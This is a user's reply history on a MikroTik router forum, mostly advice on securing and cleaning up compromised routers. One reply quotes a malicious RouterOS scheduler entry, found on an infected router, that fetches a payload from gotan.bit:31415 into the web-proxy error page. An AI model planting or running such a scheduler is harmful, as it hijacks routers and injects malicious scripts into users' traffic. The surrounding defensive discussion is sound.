Wed Sep 19, 2018 5:14 pm
Forum: General
Topic: Weird outbound UDP traffic
Replies: 19
Views: 2052

Re: Weird outbound UDP traffic

Emailing support@mikrotik.com will generate a "ticket". I agree this is poor behavior.
by R1CH
Wed Sep 19, 2018 5:13 pm
Forum: General
Topic: Help ! My Router is suddenly messing up my configuration !
Replies: 1
Views: 203

Re: Help ! My Router is suddenly messing up my configuration !

Since those aren't dynamic entries, they have been added through admin interface. Most likely your router is compromised from leaving open ports to WAN interface. You should netinstall with latest version, use known good config and change all passwords.
by R1CH
Tue Sep 18, 2018 5:49 pm
Forum: General
Topic: Mikrotik Error when generating external PDF file
Replies: 7
Views: 573

Re: Mikrotik Error when generating external PDF file

"/tool fetch url=http://gotan.bit:31415/01/error.html mode=http dst-path=webproxy/error.html" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:47 add interval=13h name=upd114 on-event=\ "/tool fetch url=http://gotan.bit:31415/01/error.html ...
by R1CH
Tue Sep 18, 2018 4:02 pm
Forum: General
Topic: Port 60000 attacks, anyone info on this?
Replies: 11
Views: 1067

Re: Port 60000 attacks, anyone info on this?

3389 is RDP, just a standard probe for vulnerable servers. Your firewall should be dropping this without requiring a dedicated rule.
by R1CH
Mon Sep 17, 2018 9:14 pm
Forum: General
Topic: Stopping connections to TCP port 1720
Replies: 6
Views: 1005

Re: Stopping connections to TCP port 1720

What kind of connection do you have? Certain modems apparently open upnp to WAN, so you're actually connecting to the modem, not the router.
by R1CH
Thu Sep 13, 2018 9:01 pm
Forum: General
Topic: Can default configuration be hacked?
Replies: 8
Views: 1012

Re: Can default configuration be hacked?

If you didn't change passwords then the attackers just reconnected with the stolen password and re-infected the router.
by R1CH
Thu Sep 13, 2018 4:46 pm
Forum: General
Topic: mikrotik configuration issue none caching pages with double quote
Replies: 2
Views: 212

Re: mikrotik configuration issue none caching pages with double quote

You may have a compromised system that has HTTP proxy enabled with malware that is injecting crypto mining scripts into pages. Safest way forward is to netinstall and change all passwords. A config export will easily identify the issue.
by R1CH
Thu Sep 13, 2018 1:29 am
Forum: Wireless Networking
Topic: MT wifi setup options for small retail shops & cafes
Replies: 1
Views: 387

Re: MT wifi setup options for small retail shops & cafes

A single wAP AC should be enough for that kind of light usage. Concurrent users depend a lot on what kind of devices are connecting (slow 2.4 GHz only?), space to be covered and how crowded the frequencies are already. If you do want to go with the annoying social media hotspot then you probably wan...
by R1CH
Thu Sep 13, 2018 1:22 am
Forum: General
Topic: Hate new firmware versioning
Replies: 2
Views: 397

Re: Hate new firmware versioning

I think most admins are in agreement, I haven't seen anyone who is a fan of the new firmware versioning!
by R1CH
Thu Sep 13, 2018 1:20 am
Forum: General
Topic: Attack on port 45678
Replies: 4
Views: 477

Re: Attack on port 45678

Probably if it ran an old version and didn't patch in time, it fell to this: https://blog.mikrotik.com/security/winb ... ility.html

Safest way forward is to netinstall. Don't forget to change all passwords.
by R1CH
Thu Sep 13, 2018 1:18 am
Forum: General
Topic: Why Mikrorik Router OS 6.42.6 UDP Traceroute Drop
Replies: 4
Views: 488

Re: Why Mikrorik Router OS 6.42.6 UDP Traceroute Drop

Are you tracing to a route which has "prohibit" status?
by R1CH
Thu Sep 13, 2018 1:15 am
Forum: General
Topic: Add emoji to the ssid name
Replies: 8
Views: 1207

Re: Add emoji to the ssid name

With the suggestions here I've made the script a bit more user friendly.
by R1CH
Tue Sep 11, 2018 1:19 am
Forum: General
Topic: [Feature request] Wireguard
Replies: 92
Views: 21178

Re: [Feature request] Wireguard

And we already know what happens when MikroTik quickly implement a protocol which then later continues to develop independently... see OpenVPN. I know it's a lot to hope for, but this could easily be avoided if Mikrotik would stop re-implementing these features themselves and start using the open s...
by R1CH
Tue Sep 11, 2018 12:52 am
Forum: Announcements
Topic: Newsletter #84
Replies: 47
Views: 12637

Re: Newsletter #84

The RouterOS implementation of OpenVPN will always have shitty throughput since it lacks UDP support.

http://sites.inka.de/bigred/devel/tcp-tcp.html

RB4011 looks like a beast of a device though!
by R1CH
Tue Sep 11, 2018 12:49 am
Forum: RouterBOARD hardware
Topic: Cloud Core Router CCR 1009 cpu Temp
Replies: 2
Views: 388

Re: Cloud Core Router CCR 1009 cpu Temp

I would guess the heatsink has come loose / blocked with debris or thermal interface has degraded.
by R1CH
Mon Sep 10, 2018 7:46 pm
Forum: Announcements
Topic: v6.43 [current] is released!
Replies: 148
Views: 28174

Re: v6.43 [current] is released!

-nm was a winbox issue-
by R1CH
Thu Sep 06, 2018 7:51 pm
Forum: General
Topic: Securing my Rb3011 under attack - SOLVED
Replies: 3
Views: 403

Re: Securing my Rb3011 under attack

You have no firewall so ALL services are exposed! Be aware that exposing any service to the internet is a risk, not even winbox is safe as it was recently exploited. Step 1: Turn off all unnecessary services in ip / services. Step 2: Create firewall rule at top of INPUT chain with ACCEPT for your IP...
by R1CH
Mon Sep 03, 2018 7:27 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 354
Views: 65350

Re: RB4011

The spec sheet lists the max operating temp as +45 C, which is much lower than most other models. I've seen ambient (internal) temps of 60c on my routers that are inside telecom closets etc so unless this has some active cooling, I'm worried it won't be able to operate in the same environments as c...
by R1CH
Mon Sep 03, 2018 3:40 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 354
Views: 65350

Re: RB4011

The spec sheet lists the max operating temp as +45 C, which is much lower than most other models. I've seen ambient (internal) temps of 60c on my routers that are inside telecom closets etc so unless this has some active cooling, I'm worried it won't be able to operate in the same environments as cu...
by R1CH
Thu Aug 30, 2018 6:18 pm
Forum: General
Topic: youtube cache on mikrotik router
Replies: 2
Views: 448

Re: youtube cache on mikrotik router

On Mikrotik is not possible, but as an ISP you can apply for a GGC.

https://peering.google.com/#/options/go ... obal-cache
by R1CH
Wed Aug 29, 2018 3:40 pm
Forum: General
Topic: Hotspot captive portal prevent automatic close on redirect after login
Replies: 22
Views: 12564

Re: Hotspot captive portal prevent automatic close on redirect after login

Be aware that by bypassing the connectivity check in this way there will be NO hotspot popup. Your users will have a very hard time triggering the captive portal redirect, as most sites are using HTTPS which means they will show scary security error messages instead of a redirect. Think carefully ab...
by R1CH
Mon Aug 27, 2018 2:45 pm
Forum: General
Topic: Mikrotik CCR-1009-7G-1C Port Loop Problem
Replies: 2
Views: 293

Re: Mikrotik CCR-1009-7G-1C Port Loop Problem

Post your config, screenshot does not really help. Most likely you have a broken bridge port config or an actual loop.
by R1CH
Sat Aug 25, 2018 12:42 am
Forum: General
Topic: Block user with bad intention
Replies: 6
Views: 766

Re: Block user with bad intention

So what happens when I spoof the IP of Google DNS or whatever DNS server you're using? Oops, your network no longer has DNS connectivity. You should NEVER add to blocklists based on a single input packet. IP spoofing is quite easy, if someone knows this is how your network is setup, they can easily ...
by R1CH
Fri Aug 24, 2018 6:17 pm
Forum: General
Topic: [SOLVED] IPv6 pings work, webpage won't load
Replies: 39
Views: 2216

Re: [SOLVED] IPv6 pings work, webpage won't load

If clamp-to-pmtu solves the problem this probably means there is something in the network path that is dropping ICMPv6 messages. This is pretty bad and you should try and figure out where this is happening and fix it if possible.
by R1CH
Thu Aug 23, 2018 8:05 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30395

Re: v6.42.7 [current] is released!

Bricked a wAP AC by installing this from 6.36 / 6.37 (wasn't paying close attention to the old version). Rebooted and ethernet is constantly cycling link / no-link, no netinstall, no backup loader. RMA time it seems.

Be careful if upgrading from older versions!
by R1CH
Thu Aug 23, 2018 3:52 am
Forum: RouterBOARD hardware
Topic: Cheapest device to support 5GHz spectral scan
Replies: 2
Views: 591

Re: Cheapest device to support 5GHz spectral scan

No Mikrotik device supports 5 GHz spectral scan.
by R1CH
Thu Aug 23, 2018 1:46 am
Forum: General
Topic: router rebooted because some critical program crashed
Replies: 5
Views: 1638

Re: router rebooted because some critical program crashed

Strong enough power supply?
by R1CH
Wed Aug 22, 2018 11:56 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 120
Views: 38198

Re: Security announcement blog

It's been a full business day and the blog is still not updated with the news about what these four security bugs from the latest RouterOS release actually are. This seems to be a step backwards, before the blog the changelog said things like "www) fixed vulnerability" so admins at least knew the ww...
by R1CH
Wed Aug 22, 2018 11:50 pm
Forum: General
Topic: MikroTiks Blocking Functionality on certain websites [SOLVED]
Replies: 3
Views: 365

Re: MikroTiks Blocking Functionality on certain websites [SOLVED]

Your client or network is considered bad to F5 Networks Application Security Manager (ASM) which is what is generating this message. Most likely because the poor firewall config let your Mikrotiks be infected and part of a botnet, so now your IP is blacklisted by certain vendors. Change IP / ISP.
by R1CH
Wed Aug 22, 2018 6:49 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30395

Re: v6.42.7 [current] is released!

I can confirm that the security fixes were added to the notes after the 6.42.7 thread was already posted! Why was this?

Image
by R1CH
Wed Aug 22, 2018 6:39 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30395

Re: v6.42.7 [current] is released!

Were these security fixes stealthily added to the v6.42.7 patch notes? I don't recall seeing them there before and I didn't update since it didn't look like a necessary update. It's very bad that details aren't available even though the fixed version is published. It doesn't take much effort to comp...
by R1CH
Wed Aug 22, 2018 6:34 pm
Forum: Announcements
Topic: v6.40.9 [bugfix] is released!
Replies: 56
Views: 14776

Re: v6.40.9 [bugfix] is released!

What is the point of publishing CVE numbers if the vulnerabilities are still private? Hackers can reverse engineer the changes in this version and figure out what the vulnerabilities are and start exploiting them, so there's no point keeping it private once you publish the fix - it only benefits hac...
by R1CH
Wed Aug 22, 2018 12:19 am
Forum: General
Topic: PSA: bandwidth-test Brute Force attempts
Replies: 2
Views: 481

Re: PSA: bandwidth-test Brute Force attempts

On a related note, it would be nice to see bandwidth-test server moved to IP / services so all the useless services can be disabled in one place.
by R1CH
Tue Aug 21, 2018 1:21 am
Forum: Wireless Networking
Topic: Improve Wifi setup - Real life test results - Google wifi vs Mikrotik vs P.O.S. AT&T
Replies: 1
Views: 804

Re: Improve Wifi setup - Real life test results - Google wifi vs Mikrotik vs P.O.S. AT&T

The RB2011 is a very old router (hence the name) which doesn't support 5 GHz, so no 802.11ac. Speeds you show are about what is expected for a 2.4 GHz network.

I recommend hAP AC / cAP AC / wAP AC instead depending on your installation needs.
by R1CH
Mon Aug 20, 2018 1:57 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30395

Re: v6.42.7 [current] is released!

Upgraded 5 x wAP AC, no issues so far.
by R1CH
Sun Aug 19, 2018 9:38 pm
Forum: General
Topic: broswer shows establishing secure connection when eoip active
Replies: 2
Views: 294

Re: broswer shows establishing secure connection when eoip active

You probably need to enable PMTU clamping.
by R1CH
Sat Aug 18, 2018 12:13 am
Forum: Wireless Networking
Topic: Open the regular browser after Captive Portal Popup login window
Replies: 3
Views: 861

Re: Open the regular browser after Captive Portal Popup login window

Sure, but those URLs will still only open in the captive portal window.
by R1CH
Fri Aug 17, 2018 5:17 pm
Forum: Wireless Networking
Topic: Open the regular browser after Captive Portal Popup login window
Replies: 3
Views: 861

Re: Open the regular browser after Captive Portal Popup login window

No, you cannot control how the client's OS behaves. Captive portal windows are usually limited in what they can do for the specific purpose of signing in.
by R1CH
Wed Aug 15, 2018 3:40 pm
Forum: General
Topic: Kernel failure using traffic generator
Replies: 1
Views: 237

Re: Kernel failure using traffic generator

The traffic generator is a kernel module coded by Mikrotik. It likely has some bugs, and bugs in the kernel mean a complete crash. I would advise against using it outside of test environments.
by R1CH
Sun Aug 12, 2018 6:17 pm
Forum: General
Topic: TCP congestion Illinos
Replies: 4
Views: 513

Re: TCP congestion Illinos

True, but using such services goes against the goals of speed anyway. OVPN in TCP mode is especially terrible.
by R1CH
Sat Aug 11, 2018 6:41 pm
Forum: General
Topic: TCP congestion Illinos
Replies: 4
Views: 513

Re: TCP congestion Illinos

Router doesn't care about the congestion algorithm, it simply forwards packets. It needs to be configured on the endpoints of the connection.
by R1CH
Sat Aug 11, 2018 2:09 am
Forum: General
Topic: TCP connections from china
Replies: 9
Views: 4808

Re: TCP connections from china

If someone is able to connect to that port, your router is insecure. Make sure to firewall all ports from WAN.
by R1CH
Thu Aug 09, 2018 1:46 pm
Forum: Wireless Networking
Topic: Open url / link from Hotspot login page in a browser
Replies: 1
Views: 308

Re: Open url / link from Hotspot login page in a browser

This is entirely dependent on the client device and not something you can configure.
by R1CH
Thu Aug 09, 2018 1:39 pm
Forum: General
Topic: Security breached devices - Port TCP 4145
Replies: 12
Views: 3680

Re: Security breached devices - Port TCP 4145

I think you misunderstand, this isn't about services listening on high ports. Say for example client on the network want to connect to Google DNS, 8.8.8.8 port 53. Their OS has to pick a port on the system to send the query, and to which replies are sent, for example maybe it picks 192.168.88.10 por...
by R1CH
Thu Aug 09, 2018 12:49 pm
Forum: General
Topic: Security breached devices - Port TCP 4145
Replies: 12
Views: 3680

Re: Security breached devices - Port TCP 4145

Traffic above the reserved ports (0-1024) can be attributed to ephemeral port use. While most OSes generally use the higher end of available ports, there's nothing stopping them from using 1025-65535 as ephemeral port numbers.
by R1CH
Thu Aug 09, 2018 12:46 pm
Forum: Announcements
Topic: WPA2 preshared key brute force attack
Replies: 26
Views: 24756

Re: WPA2 preshared key brute force attack

How do you get the PMKID from a Mikrotik AP? I have tried the attack on my wAP AC (WPA2-PSK), but the driver didn't implement the necessary fields.
by R1CH
Wed Aug 08, 2018 6:10 pm
Forum: RouterBOARD hardware
Topic: upgrade from RB951G-2HnD
Replies: 3
Views: 495

Re: upgrade from RB951G-2HnD

The IPQ4018 used in new products is much faster than the CPU in RB951G-2HnD.
by R1CH
Wed Aug 08, 2018 1:18 am
Forum: General
Topic: Winbox Vulnerability Changes
Replies: 1
Views: 330

Re: Winbox Vulnerability Changes

The vulnerability allows someone full admin access to the router, so they could change anything and everything. Mikrotik seem to suggest that winbox can even be elevated to shell access, in which case undetectable backdoors could be installed. The safest way to restore a router is export the config,...
by R1CH
Tue Aug 07, 2018 7:11 pm
Forum: Wireless Networking
Topic: PMKID Attack - clientless WPA2/WPA PSK attack
Replies: 6
Views: 3123

Re: PMKID Attack - clientless WPA2/WPA PSK attack

I've attempted this attack against a wAP AC and it was unsuccessful. I don't think Mikrotik's wireless driver implements the features that this attack exploits.
by R1CH
Tue Aug 07, 2018 2:24 pm
Forum: General
Topic: Block devices with cloned MAC addresses
Replies: 2
Views: 337

Re: Block devices with cloned MAC addresses

The only decent way is to use EAP / 802.1x for authentication so there are per-client encryption keys.
by R1CH
Tue Aug 07, 2018 2:12 pm
Forum: General
Topic: Warning BotNet Attacks! Noticing These IP's! Suggest blocking them!
Replies: 2
Views: 759

Re: Warning BotNet Attacks! Noticing These IP's! Suggest blocking them!

If the bots are even able to try to log in, this means you are exposing winbox / SSH to the internet, and your router will be compromised when the next exploit is found. Any router that has open ports to the internet is not secure according to Mikrotik.
by R1CH
Tue Aug 07, 2018 2:11 pm
Forum: General
Topic: 100% CPU CCR1072 due DDoS - How to improve?
Replies: 16
Views: 1179

Re: 100% CPU CCR1072 due DDoS - How to improve?

close port 80 from outside use. This is not a solution to CPU consumption. Also, if it's a web server you can't do this, it's a useless solution because the attacker can choose any port. It is a solution if you have a listening service on port 80. This is a SYN flood, if you actually have an applic...
by R1CH
Mon Aug 06, 2018 5:48 pm
Forum: General
Topic: HTTPS & Force to login from devices
Replies: 2
Views: 317

Re: HTTPS & Force to login from devices

Allowing *google* and gstatic.com will likely break captive portal detection on client devices.